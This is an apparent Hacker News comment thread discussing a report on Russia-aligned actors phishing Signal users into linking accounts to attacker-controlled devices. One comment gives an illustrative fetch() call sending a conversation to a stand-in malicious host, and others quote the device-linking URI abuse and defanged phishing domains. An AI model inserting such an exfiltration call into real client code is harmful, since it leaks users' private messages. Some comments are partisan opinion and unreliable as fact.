Multiple Russia-aligned threat actors actively targeting Signal Messenger

(cloud.google.com)

Comments

vetrom 19 February 2025
Signal (and basically any app) with a linked devices workflow has been risky for a while now. I touched on this last year (https://news.ycombinator.com/context?id=40303736) when Telegram was trash talking Signal -- and its implementation of linked devices has been problematic for a long time: https://eprint.iacr.org/2021/626.pdf.

I'm only surprised it took this long for an in-the-wild attack to appear in open literature.

It certainly doesn't help that Signal themselves have discounted this attack (quoted from the IACR eprint paper):

    "We disclosed our findings to the Signal organization on October 20, 2020, and received an answer on October 28, 2020. In summary, they state that they do not treat a compromise of long-term secrets as part of their adversarial model"
parhamn 19 February 2025
One thing I'm realizing more and more (I've been building an encrypted AI chat service which is powered by encrypted CRDTs) is that "E2E encryption" really requires the client to be built and verified by the end user. I mean, at the end of the day you can put a one-line fetch/analytics-tracker/etc. on the rendering side and everything your protocol claimed to do becomes useless. That even goes further, to the OS that the rendering is done on.

The last bit adds an interesting facet: even if you manage to open source the client and manage to make it verifiably buildable by the user, you still need to distribute it on the iOS store. Anything can happen in the publish process. I use iOS as the example because it's particularly tricky to load your own build of an application.

And then if you did that, you still need to do it all on the other side of the chat too, assuming it's a multi-party chat.

You can have every cute protocol known to man, the best encryption algorithms on the wire, etc., but at the end of the day it's all trust.

I mention this because these days I worry more that using something like Signal actually makes you a target for snooping under the false guise that you are in a totally secure environment. If I were a government agency with intent to snoop, I'd focus my resources on Signal users; they have the most to hide.

Sometimes it all feels pointless (besides encrypted storage).

I also feel weird that the bulk of the discussion is on the hypothetical validity of a security protocol, usually focused on the maths, when all of that can be subverted with a fetch("https://malvevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?

untech 19 February 2025
It is not plainly stated in the article, but as far as I understand, the first step of one of the attacks is to take the smartphone off a dead soldier’s body.
BrenBarn 19 February 2025
Is this suggesting that a single QR scan can on its own perform the device linking? If so, it seems like that's kind of the hole here, right? Like you shouldn't be able to scan a code that on its own links the device; you should have to manually confirm with like "Yes I want to link to this device". And then if you thought you were scanning a group invite code you'd realize you weren't. (Yeah, you'd still have to realize that, but I think it's a meaningful step up over just "you scanned a code to join a group and instead it silently linked a different device".)
1970-01-01 19 February 2025
The good news is the target is targeted for a reason: it's still effective.
josh2600 19 February 2025
There are many voices which try to tell you that signal is compromised. Notice that all of those voices have less open-source-ness than Signal in virtually all cases.

Signal is doing its best to be a web scale company and also defend human rights. Individual dignity matters.

This is not a simple conversation.

anotherhue 19 February 2025
You can check for unexpected linked devices in the settings menu.
andreygrehov 19 February 2025
They provided some domains, but not all of them are taken. For example, signal-protect[.]host is available, kropyva[.]site is available, signal-confirm[.]site is registered in Ukraine. Some of them are registered in Russia.

Never trust a country at war—any side. Party A blames B, Party B blames A, but both have their own agenda.

evilfred 19 February 2025
"Russia-aligned threat"... so... the US?
aembleton 20 February 2025
> In each of the fake group invites, JavaScript code that typically redirects the user to join a Signal group has been replaced by a malicious block containing the Uniform Resource Identifier (URI) used by Signal to link a new device to Signal (i.e., "sgnl://linkdevice?uuid="), tricking victims into linking their Signal accounts to a device controlled by UNC5792.

Missing from their recommendations: Install No Script: https://noscript.net/

lifeinthevoid 20 February 2025
They should add an option to not allow linking additional devices, if that’s feasible.
gck1 20 February 2025
> Android supports alphanumeric passwords, which offer significantly more security than numeric-only PINs or patterns.

Ironic, coming from Google, as Android is THE only OS where usage of alphanumeric passwords is nearly impossible: Android limits the length of a password to an arbitrary 16 characters, preventing usage of passphrases.

advisedwang 19 February 2025
Kind of a good sign for signal's security that this is the best Russia has got!
p2detar 19 February 2025
Last week it was Microsoft, now Signal, who’s next?

https://www.microsoft.com/en-us/security/blog/2025/02/13/sto...

casenmgreen 19 February 2025
Can't view the article, as I am an evil Tor user.
mppm 6 hours ago
Am I reading this right? You can initiate device linking in Signal by clicking on an external URL? This is so stupid, I don't even have words for this. In a security-focused app you should not be able to link anything without manually going into the devices/link menu and clicking "link new device".
sharpshadow 20 February 2025
“Russia's re-invasion of Ukraine”

Reading this for the first time, what is a “re-invasion”? Do they mean the explained cyber attack as second invasion aka “re-invasion”?

Shorel 20 February 2025
Signal should be doing something well.
aussieguy1234 20 February 2025
Phone verification is a common method used here.

If somehow the victim's phone provider can be compromised or coerced into cooperating, the government actor can intercept the text message Signal and others use for verification and set up the victim's account on a new device.

It's very easily done if the victim is located in an authoritarian country like Russia or Iran; they can simply force the local phone provider to co-operate.

ge96 19 February 2025
that's nice they provided a list of bad domains
Yeul 19 February 2025
Honestly don't use Signal for privacy or anonymity. I switched to it because it is not owned by a sycophant of Trump.

Oh how Americans make fun of the CCP but watching all the tech bros bend the knee was embarrassing.

4ndrewl 19 February 2025
"Russia-aligned threat actors" has a whole new meaning this last week.
karel-3d 19 February 2025
tldr: they mostly use phishing with fake Ukrainian army group invites to trick people (from the Ukrainian army) into linking the phone device to an attacker-controlled PC.

Also they try to get the actual database SQL files from Windows devices and Android devices.

lenerdenator 19 February 2025
I'd love to have more of my socializing happening on Signal. Anyone got a good way to convince the non-paranoid to use it?
chinathrow 19 February 2025
Russia fucking up the world's stuff this decade will be the material for history books. They are actively breaking Europe and almost no one seems to care.
whatever1 19 February 2025
Impossible these are our newly minted allies
8bithero 19 February 2025
So a few days ago Elon Musk blocked all links to Signal from the X platform and now this... Could be a coincidence but the timing sure is sus.
paganel 19 February 2025
Alphabet is working in tandem with the Ukrainian SBU? Interesting choice, just as the US President has called Zelensky a dictator (and for good reason, Poroshenko, the previous Ukrainian president, has basically said the same thing a few days ago). I wonder how long the Alphabet higher-ups will allow this thing to unfold, or maybe they're not so good at reading the geopolitical tea leaves.
lovegrenoble 19 February 2025
Highly likely...
adultSwim 19 February 2025
Is this why twitter has been blocking signal.me links? https://news.ycombinator.com/item?id=43076710
JohnnyLarue 20 February 2025
State-aligned, huh? This is the US State Department talking point equivalent of a movie poster that brags, "From the studio that brought you..."